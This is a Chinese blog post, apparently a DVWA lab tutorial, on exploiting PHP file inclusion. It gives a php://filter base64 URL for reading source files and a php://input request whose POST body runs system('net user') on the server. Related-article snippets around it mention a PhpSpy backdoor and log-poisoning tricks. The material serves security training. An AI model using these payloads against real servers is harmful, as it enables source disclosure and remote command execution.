文件包含漏洞之——php包含读写文件

最新推荐文章于 2022-11-30 21:22:00 发布
最新推荐文章于 2022-11-30 21:22:00 发布
阅读量1k 收藏 1
点赞数
分类专栏: web渗透测试与代码审计 #+ 文件包含漏洞 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43079958/article/details/105398520
版权

php包含读写文件

目录

php包含读文件

实验环境

	实验环境DVWA,安全性low
		条件是要知道这个文件的名称和路径

操作

浏览器打开代理,开启burp 在浏览器中构造URL
http://192.168.1.55:8080/dvwa/vulnerabilities/fi/?page=php://filter/read=convert.base64-encode/resource=x.php
这个地址的作用是访问URL,修改包含函数的参数,由此通过php协议(php://filter/read)得到经过base64加密后的字符串
再解密就可以得到PHP数据内容了

php包含写文件

构造URL
http://192.168.1.55:8080/dvwa/vulnerabilities/fi/?page=php://input

并且burp提交post数据为:<?php system('net user');?> 使用php语言,system函数,执行net user
函数也可以采用很多其他可以执行命令的函数都可以在这里使用

注意

只有在allow
_url_include为on的时候才可以使用,如果想查看回显结果那必须在C:\php\php-5.2.14-Win32下找到php-apache2handler.ini打开,查找display_funtions=proc-open,oppen,exec,system…….删掉system重启apache。

温柔小薛
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHP文件操作之文件取方法详解
10-28
在上一篇PHP教程中介绍了如何利用PHP实现文件操作中的文件入功能,接下来和大家分享PHP文件取功能的应用实例
PHP文件操作之文件入代码
10-28
今天和大家分享如何利用PHP技术实现文件文件入操作教程,也算是对PHP文件操作的入门学习。
文件包含技巧拓展】————3、文件包含漏洞(上)
Fly_鹏程万里
01-30 600
导语: 当程序员在编代码的过程中,由于使用PHP文件包含函数过滤不严,从而导致了文件包含漏洞。在PHP中用于文件包含的函数有四个: require require_once include include_once include和require区别主要是include在包含的过程中如果出现错误,会抛出一个警告,程序继续正常运行;而require函数出现错误的时候,会直接报错并退出程序...
文件包含总结
akxnxbshai的博客
11-30 1396
简单总结一下php漏洞,然后再学习java。
文件包含与头文件
RamiYim的专栏
11-24 807
很多人对C语言中的 “文件包含”都不陌生了,文件包含处理在程序开发中会给我们的模块化程序设计带来很大的好处,通过文件包含的方法把程序中的各个功能模块联系起来是模块化程序设计中的一种非常有利的手段。       文件包含处理是指在一个源文件中,通过文件包含命令将另一个源文件的内容全部包含在此文件中。在源文件编译时,连同被包含进来的文件一同编译,生成目标文件。     很多人再初学时都会对这个很晕
网络安全——文件包含漏洞
weixin_54055099的博客
09-24 1716
文件包含漏洞的原理
文 件 包 含
tbygadgjsad的博客
02-28 272
什么是文件包含? 下图很好的表达了"文件包含"的含义,图1中(a)为文件f1.c,它有一个#include “f2.c”命令,后面跟着文件内容,记为程序1.图1中(b)为另一个文件f2.c,文件内容以程序2表示。在预编译时,对要#include命令进行"文件包含"处理,将f2.c的全部内容复制插入到#include “f2.c” 命令处,即f2.c被包含到f1.c中,得到如图1中(c)所示的结果。在编译时,将"包含"以后的f1.c(如图1中(c))作为一个源文件进行编译处理。 文件包含:开发人员通常
PHP文件数据类网站实例开发源码——文件管理器(PHP).zip
10-24
该压缩包文件PHP文件数据类网站实例开发源码——文件管理器(PHP).zip”包含了一个基于PHP文件管理系统源代码。这个系统主要是为了帮助用户管理和操作服务器上的文件,如浏览、上传、下载、删除等基本操作。让...
PHP实例开发源码——PhpSpy 2008 WEB后门程序.zip
11-22
4. **文件操作**:后门可能涉及服务器上的文件,包括日志、配置文件等,因此需要理解PHP文件I/O函数,如`file_get_contents()`、`file_put_contents()`等。 5. **网络通信**:PhpSpy可能通过网络发送或接收...
基于PHP的基于Ajax的php开源留言板 JibberBook.zip
最新发布
07-26
维护JibberBook包括定期更新以修复安全漏洞,备份数据库,以及监控服务器性能。同时,应遵循最佳实践,例如: - 定期更新PHP和依赖库以获取最新的安全补丁。 - 使用HTTPS加密传输,保护用户数据的安全。 - 对用户...
PHP安全配置(4)
03-04
如果一个存在本地包含漏洞PHP程序能够入access-log,攻击者可以通过构造特殊的URL来注入PHP代码,然后通过包含这个日志文件来执行这些代码,从而获取服务器的本地访问权限。因此,必须确保只有Apache进程本身...
Pokebattle:pokebattle
02-09
开发者可能会利用PHP的过滤和验证函数防止SQL注入,使用CSRF令牌防止跨站请求伪造,以及设置合适的文件上传限制以防止文件包含漏洞。 6. **性能优化**:对于大型在线游戏,性能优化至关重要。PHP可以通过缓存技术...
文件上传漏洞之——漏洞进阶(文件,文件,包含图片马,包含日志文件,截断包含)
wsnbbz的博客
03-04 4211
php协议 PHP带有很多内置URL风格的封装协议,可用于类似fopen()、copy()、 file_ exists()和filesize()的文件系统函数 file:// 访问本地文件系统 http:// 访问HTTP(s)网址 ftp:// 访问FTP(s)URLS php:// 访问各个输入/输出流(I/o streams) zlib:// 压缩流 data:// 数据(RFC2397) ...
配合php伪协议利用文件包含漏洞
超人学飞的日子
06-06 9200
php支持多种封装协议,这些协议常被CTF出题中与文件包含漏洞结合,这里做个小总结。实验用的是DVWA平台,low级别,phpstudy中的设置为5.4.45版本,设置allow_url_fopen和allow_url_include都为On.index.phpindex.php同级目录下有mytest001.txt ,mytest002.txt ,mytest003.zip(其中包含mytest...
PHP文件包含与命令执行方式总结
baidu_33260220的博客
11-25 2722
转自:http://www.myhack58.com/Article/html/3/7/2012/36277.htm 1、文件包含利用 通过传递本地或者远程的文件(allow_url_fopen开启)作为参数进行利用,可以取敏感信息、执行命令、GetWebshell. Type of call: require($file); Exploit: http://host/?fi
PHP文件包含漏洞(利用phpinfo)
Li-D的博客
12-31 8491
漏洞描述 文件包含漏洞的产生原因是在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。 PHP中引发文件包含漏洞的通常是以下四个函数: 1、include()当使用该函数包含文件时,只有代码执行到include()函数时才将文件包含进来,发生错误时只给出一个警告,继续向下执行。 2、include_once()功能和include()相同,区别在于当重复调用同一文件时,程序只调用一次。 3、require()只要程序一执行就
文件包含文件包含漏洞知识总结
热门推荐
Monsterlz123的博客
06-28 1万+
文件包含文件包含漏洞知识总结 Hello,各位小伙伴周五好~ 这里是你们的劳模小编~ 之前一期,我们已经一起总结了文件上传和文件解析漏洞。 今天我们就一起来看看文件包含漏洞吧~ 一、什么是文件包含漏洞? 1、文件包含概述 和SQL注入等攻击方式一样,文件包含漏洞也是一种“注入型漏洞”,其本质就是输入一段用户能够控制的脚本或者代码,并让服务器端执行。 什么叫包含呢?以PHP为例,我们常常把...
文件包含漏洞之——str_replace函数绕过与——包含截断绕过
温柔小薛的博客
04-08 6411
str_replace函数绕过 实验环境DVWA,安全性medium 有时程序员会使用str_replace函数进行防御,这个函数是极其不安全的,因为可以使用双绕过替换规则轻松绕过 绕过方法 例如page=hthttp://tp://192.168.0.103/phpinfo.txt时,str_replace函数会将http://删除,于是page=http://192.168.0.103...
python获取文件位置_python学习——文件
05-31
你可以使用文件对象的tell()方法获取文件位置,该方法返回当前文件指针的位置(也就是当前取或入位置)。 例如,以下代码打开一个文件取其中的一行,然后使用tell()方法获取当前取位置: ``` with open('example.txt', 'r') as f: line = f.readline() print(line) print(f.tell()) ``` 输出结果将会是: ``` This is an example file. 30 ``` 其中第二行输出的数字 30 表示当前取位置是文件的第 31 个字节(因为 Python 中的索引是从 0 开始的)。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值